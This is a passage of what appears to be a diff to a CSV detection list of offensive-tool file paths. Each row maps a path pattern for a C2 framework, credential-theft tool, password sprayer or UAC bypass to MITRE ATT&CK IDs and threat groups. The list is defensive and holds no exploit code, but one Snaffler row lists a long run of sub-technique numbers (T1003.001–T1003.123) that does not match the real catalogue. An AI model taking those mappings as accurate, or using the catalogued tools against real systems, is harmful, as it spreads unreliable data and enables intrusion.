- T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/Tool-X.git*","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/top_mots_combo.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" +"*/top_mots_combo.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" "*/top-usernames-shortlist.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/tor-0.*.tar.gz*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tor-consensus-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tor-gencert.exe*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/traceroute-geolocation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/tracers_fuzzer.cc*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/tracers_fuzzer.cc*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/trackerjacker*","offensive_tool_keyword","trackerjacker","Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.","T1040 - T1018 - T1591","TA0007 - - TA0043","N/A","N/A","Information Gathering","https://github.com/calebmadrigal/trackerjacker","1","0","N/A","N/A","10","2537","190","2020-12-24T20:53:31Z","2016-12-18T22:01:13Z" "*/Trackflaw/CVE*.py*","offensive_tool_keyword","poc","Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tools","https://github.com/Trackflaw/CVE-2023-23397","1","1","N/A","N/A","1","99","24","2023-03-24T10:46:38Z","2023-03-20T16:31:54Z" -"*/transports/scramblesuit/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*/TreeWalker.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*/TREVORspray.git*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*/trevorspray.log*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*/transports/scramblesuit/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/TreeWalker.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/TREVORspray.git*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*/trevorspray.log*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*/trganda/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" "*/trick_ryuk.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/trickbot.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*/tried_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*/TriggerLinux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/trollsploit/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/tried_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*/TriggerLinux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/trollsploit/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/TROUBLE-1/Vajra*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" -"*/trusted_sec_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/trusted_sec_remote_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/trusted_sec_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/trusted_sec_remote_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/trustedsec/*","offensive_tool_keyword","Github Username","github repo hosting various exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/trustedsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tso-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tso-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" -"*/twittor.git*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","253","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*/tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*/twittor.git*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*/uac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/UACBypasses/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*/UACME.git*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*/UAC-SilentClean/*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/UACME.git*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by 